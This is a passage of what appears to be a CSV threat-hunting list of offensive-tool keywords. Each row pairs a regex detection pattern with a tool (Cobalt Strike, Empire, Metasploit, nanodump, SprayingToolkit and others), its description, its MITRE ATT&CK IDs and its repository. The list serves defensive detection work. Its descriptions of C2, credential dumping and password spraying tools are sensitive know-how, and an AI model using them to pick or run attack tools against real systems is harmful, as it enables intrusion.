Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*'spawnto_x64'*",".{0,1000}\'spawnto_x64\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spawnto_x64.py*",".{0,1000}spawnto_x64\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*spawnto_x86 -Application*",".{0,1000}spawnto_x86\s\-Application.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*'spawnto_x86'*",".{0,1000}\'spawnto_x86\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*spawnto_x86.py*",".{0,1000}spawnto_x86\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*specialtokengroupprivs.py*",".{0,1000}specialtokengroupprivs\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Specified user is a Domain Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sDomain\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Specified user is a Enterprise Admin. Use the -Force switch to override*",".{0,1000}Specified\suser\sis\sa\sEnterprise\sAdmin\.\sUse\sthe\s\-Force\sswitch\sto\soverride.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Specify domain for enumeration*",".{0,1000}Specify\sdomain\sfor\senumeration.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*Specify -instanceid 1337*Specify -source 'Persistence*",".{0,1000}Specify\s\-instanceid\s1337.{0,1000}Specify\s\-source\s\'Persistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*SpecterOps/Nemesis*",".{0,1000}SpecterOps\/Nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Spel_RCE_Bash_EXP.py*",".{0,1000}Spel_RCE_Bash_EXP\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Spel_RCE_POC.py*",".{0,1000}Spel_RCE_POC\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*spiderfoot -l 127.0.0.1:*",".{0,1000}spiderfoot\s\-l\s127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*spiderfoot-cli -s http*",".{0,1000}spiderfoot\-cli\s\-s\shttp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*-SpiderFoot-correlations.csv*",".{0,1000}\-SpiderFoot\-correlations\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*spiderfoot-master*",".{0,1000}spiderfoot\-master.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SpiderLabs/DoHC2*",".{0,1000}SpiderLabs\/DoHC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*SpiderLabs/Responder*",".{0,1000}SpiderLabs\/Responder.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*spindrift.py *--target *",".{0,1000}spindrift\.py\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spindrift.py --domain*",".{0,1000}spindrift\.py\s\-\-domain.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*Spins up catspin using Api Gateway proxy*",".{0,1000}Spins\sup\scatspin\susing\sApi\sGateway\sproxy.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*",".{0,1000}sploitus\.com\/exploit\?id\=6C1081C5\-7938\-5E83\-9079\-719C1B071FB5.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*splunk/upload_app_exec/*",".{0,1000}splunk\/upload_app_exec\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*splunk_whisperer.py*",".{0,1000}splunk_whisperer\.py.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*splunk_whisperer-master*",".{0,1000}splunk_whisperer\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*SplunkWhisperer2-master*",".{0,1000}SplunkWhisperer2\-master.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*-spn * -clsid * -shadowcred*",".{0,1000}\-spn\s.{0,1000}\s\-clsid\s.{0,1000}\s\-shadowcred.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*SPN:SharpRoast.exe*",".{0,1000}SPN\:SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*spnroast_*.txt*",".{0,1000}spnroast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*spoof.py *.dll*",".{0,1000}spoof\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","0","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*spoof_wani*",".{0,1000}spoof_wani.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*spoof_wlan_creds*",".{0,1000}spoof_wlan_creds.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*--spoof-callstack *",".{0,1000}\-\-spoof\-callstack\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*SpooferHostsIgnore*",".{0,1000}SpooferHostsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferHostsReply*",".{0,1000}SpooferHostsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIP*",".{0,1000}SpooferIP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIPsIgnore*",".{0,1000}SpooferIPsIgnore.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferIPsReply*",".{0,1000}SpooferIPsReply.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferLearningDelay*",".{0,1000}SpooferLearningDelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*SpooferLearningInterval*",".{0,1000}SpooferLearningInterval.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 